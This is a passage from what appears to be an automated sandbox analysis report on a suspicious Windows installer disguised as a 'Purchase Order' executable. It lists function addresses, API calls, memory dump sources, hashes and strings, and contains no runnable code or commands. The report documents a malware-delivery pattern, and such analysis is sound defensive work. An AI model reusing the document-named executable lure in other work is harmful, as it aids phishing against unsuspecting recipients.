                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                              • String ID: Call$N$gC@
                                              • API String ID: 3103080414-2733886405
                                              • Opcode ID: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                              • Instruction ID: 67960cbe9d5dd80a83daf25f2437327cccbb0fafcef4e9f4d39b28ee92a42e65
                                              • Opcode Fuzzy Hash: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                              • Instruction Fuzzy Hash: ED618FB1900209BFDB109F60DD85EAA7B79FB84345F00853AF605B62D0D77DA951CFA8
                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                              Download Yara Rule
                                              APIs
                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                              • BeginPaint.USER32(?,?), ref: 00401047
                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                              • DeleteObject.GDI32(?), ref: 004010ED
                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                              • DrawTextW.USER32(00000000,00433EE0,000000FF,00000010,00000820), ref: 00401156
                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                              • DeleteObject.GDI32(?), ref: 00401165
                                              • EndPaint.USER32(?,?), ref: 0040116E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                              • String ID: F
                                              • API String ID: 941294808-1304234792
                                              • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                              • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                              • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                              • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                              Function 00405F06 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004060A1,?,?), ref: 00405F41
                                              • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F4A
                                                • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                              • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F67
                                              • wsprintfA.USER32 ref: 00405F85
                                              • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,?,004310E8,?,?,?,?,?), ref: 00405FC0
                                              • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 00405FCF
                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406007
                                              • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040605D
                                              • GlobalFree.KERNEL32(00000000), ref: 0040606E
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406075
                                                • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405DB4
                                                • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,?,0000000A), ref: 00405DD6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                              • String ID: %ls=%ls$[Rename]
                                              • API String ID: 2171350718-461813615
                                              • Opcode ID: 19ce75182fe0bcfe9ef27c5950cf2d0ac50ba1a4511b366fbaff45796f309885
                                              • Instruction ID: 4536b0422d5dde00314373cba87b6dc9e05edcb010d47b65b9eea0f1bfd6f862
                                              • Opcode Fuzzy Hash: 19ce75182fe0bcfe9ef27c5950cf2d0ac50ba1a4511b366fbaff45796f309885
                                              • Instruction Fuzzy Hash: 5A313531641B04BBC220AB659D48F6B3AACEF45744F15003FFA46F62D2DB7C98118ABD
                                              Function 0040654E Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                              Download Yara Rule
                                              APIs
                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040336A,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,?,0000000A), ref: 004065B1
                                              • CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004065C0
                                              • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040336A,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,?,0000000A), ref: 004065C5
                                              • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040336A,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,?,0000000A), ref: 004065D8
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040654F, 00406554
                                              • "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe", xrefs: 0040654E
                                              • *?|<>/":, xrefs: 004065A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Char$Next$Prev
                                              • String ID: "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 589700163-3507125664
                                              • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                              • Instruction ID: 36fae6fd7d65e337959ab81909abbfc549fe516cf0b4c9ff473ab524d2c4c229
                                              • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                              • Instruction Fuzzy Hash: B611B65580061279DB302B14BC40EB762F8EF54764F56403FED86732C8EBBC5C9292AD
                                              Function 00404298 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EB), ref: 004042B5
                                              • GetSysColor.USER32(00000000), ref: 004042F3
                                              • SetTextColor.GDI32(?,00000000), ref: 004042FF
                                              • SetBkMode.GDI32(?,?), ref: 0040430B
                                              • GetSysColor.USER32(?), ref: 0040431E
                                              • SetBkColor.GDI32(?,?), ref: 0040432E
                                              • DeleteObject.GDI32(?), ref: 00404348
                                              • CreateBrushIndirect.GDI32(?), ref: 00404352
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                              • String ID:
                                              • API String ID: 2320649405-0
                                              • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                              • Instruction ID: a3c6a1d12b74a4a342abaca89036a15a37f51972f1e3113ed1cbee018e9c0b42
                                              • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                              • Instruction Fuzzy Hash: 772156716007059BC724DF78D948B5B77F4AF81710B04893DED96A26E0D734E544CB54
                                              Function 00405322 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenW.KERNEL32(0042C228,00000000,0041D800,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                              • lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041D800,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                              • lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,0041D800,755723A0), ref: 0040537D
                                              • SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                              • String ID:
                                              • API String ID: 2531174081-0
                                              • Opcode ID: 74e9fe34f80c9fd4ff69564e83979c50d7f5e186eca222eace7b8ab87805a7eb
                                              • Instruction ID: 851cb2e595d07e8670ef4c489cf40fd5108cb81fe88e509cf6dd9e4b353e565e
                                              • Opcode Fuzzy Hash: 74e9fe34f80c9fd4ff69564e83979c50d7f5e186eca222eace7b8ab87805a7eb
                                              • Instruction Fuzzy Hash: 20218371900518BACF11AFA5DD859CFBFB9EF45350F14807AF904B62A0C7B94A40DFA8
                                              Function 00404BEC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C07
                                              • GetMessagePos.USER32 ref: 00404C0F
                                              • ScreenToClient.USER32(?,?), ref: 00404C29
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C3B
                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C61
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Message$Send$ClientScreen
                                              • String ID: f
                                              • API String ID: 41195575-1993550816
                                              • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                              • Instruction ID: 457ccdd811883e010b73e4973708530e0d9e00004b69c5e73a61d7a3cd07de8f
                                              • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                              • Instruction Fuzzy Hash: CF015271900218BAEB10DBA4DD85BFEBBBCAF95711F10412BBA50B71D0D7B499018BA4
                                              Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                              • MulDiv.KERNEL32(000B0B69,?,000B0D6D), ref: 00402E3C
                                              • wsprintfW.USER32 ref: 00402E4C
                                              • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                              Strings
                                              • verifying installer: %d%%, xrefs: 00402E46
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Text$ItemTimerWindowwsprintf
                                              • String ID: verifying installer: %d%%
                                              • API String ID: 1451636040-82062127
                                              • Opcode ID: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
                                              • Instruction ID: 97abdd23f95b89fa957f28f44bfdcbbe1494948371ff671501e6f707f2390605
                                              • Opcode Fuzzy Hash: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
                                              • Instruction Fuzzy Hash: B7014F7164020CBBEF209F60DE49FAA3B69AB04304F008439FA06B91E0DBB885558B98
                                              Function 7012256D Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 7012121B: GlobalAlloc.KERNEL32(?,?,7012123B,?,701212DF,00000019,701211BE,-000000A0), ref: 70121225
                                              • GlobalFree.KERNEL32(?), ref: 7012265B
                                              • GlobalFree.KERNEL32(00000000), ref: 70122690
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2026022448.0000000070121000.00000020.00000001.01000000.00000004.sdmp, Offset: 70120000, based on PE: true
                                              • Associated: 00000000.00000002.2025997194.0000000070120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2026073766.0000000070123000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2026100149.0000000070125000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_70120000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Global$Free$Alloc
                                              • String ID:
                                              • API String ID: 1780285237-0
                                              • Opcode ID: 6191c6fa75ece922e2ec33444d4fd5968dd3a8a184a7c1f424dde8cc37db1eb5
                                              • Instruction ID: a4c287c6f59daf2efd602b1237c3d7b4480349610fdd91c6b6294d182ebbbf93
                                              • Opcode Fuzzy Hash: 6191c6fa75ece922e2ec33444d4fd5968dd3a8a184a7c1f424dde8cc37db1eb5
                                              • Instruction Fuzzy Hash: 5B31F233704101FFC7268F54EC98D6EB7BAEB9530673145ACFA4287A20C770A846DB29
                                              Function 004028DD Relevance: 9.1, APIs: 6, Instructions: 72memoryfileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405DB4
                                                • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,?,0000000A), ref: 00405DD6
                                              • GlobalAlloc.KERNEL32(?,?), ref: 00402901
                                              • CloseHandle.KERNEL32(?), ref: 00402981
                                                • Part of subcall function 00403347: SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,?,0000000A), ref: 00403355
                                              • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 0040291D
                                              • GlobalFree.KERNEL32(?), ref: 00402956
                                              • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                • Part of subcall function 00403116: GetTickCount.KERNEL32 ref: 00403180
                                                • Part of subcall function 00403116: GetTickCount.KERNEL32 ref: 00403227
                                                • Part of subcall function 00403116: MulDiv.KERNEL32(7FFFFFFF,?,00000000), ref: 00403250
                                                • Part of subcall function 00403116: wsprintfW.USER32 ref: 00403263
                                              • DeleteFileW.KERNEL32(?), ref: 00402995
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: FileGlobal$AllocCountFreeTick$AttributesCloseCreateDeleteHandlePointerwsprintf
                                              • String ID:
                                              • API String ID: 2082585436-0
                                              • Opcode ID: 59aa42c9d05685b1ffcd52ea4e5ab7aec48a923e688f36ed6599b4daa238c64c
                                              • Instruction ID: 261d92145e3bba679300767c23cfdc886404b76ac91639140900aca6c524774b
                                              • Opcode Fuzzy Hash: 59aa42c9d05685b1ffcd52ea4e5ab7aec48a923e688f36ed6599b4daa238c64c
                                              • Instruction Fuzzy Hash: 8B216DB1800118BBCF116FA5DE49CEE7E79EF08364F14413AF960762E0CB794D419B58
                                              Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsh5948.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll,?,?,?,00000021), ref: 004025E8
                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsh5948.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll,?,?,?,00000021), ref: 004025F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWidelstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\nsh5948.tmp$C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll
                                              • API String ID: 3109718747-2432596853
                                              • Opcode ID: 838fef82e08b076f5d49a30e748d8985297f415acc20a77e8e630ea48f411f47
                                              • Instruction ID: 4af4a56a495a7247eb1268c7c56f37f79310e300d8c273c1dd4748c0a8a00d57
                                              • Opcode Fuzzy Hash: 838fef82e08b076f5d49a30e748d8985297f415acc20a77e8e630ea48f411f47
                                              • Instruction Fuzzy Hash: 41110872A04301BADB046FB18E89A9F7664AF44398F24443FF103F61D0DAFC89416B5E
                                              Function 701218DD Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2026022448.0000000070121000.00000020.00000001.01000000.00000004.sdmp, Offset: 70120000, based on PE: true
                                              • Associated: 00000000.00000002.2025997194.0000000070120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2026073766.0000000070123000.00000002.00000001.01000000.00000004.sdmpDownload File
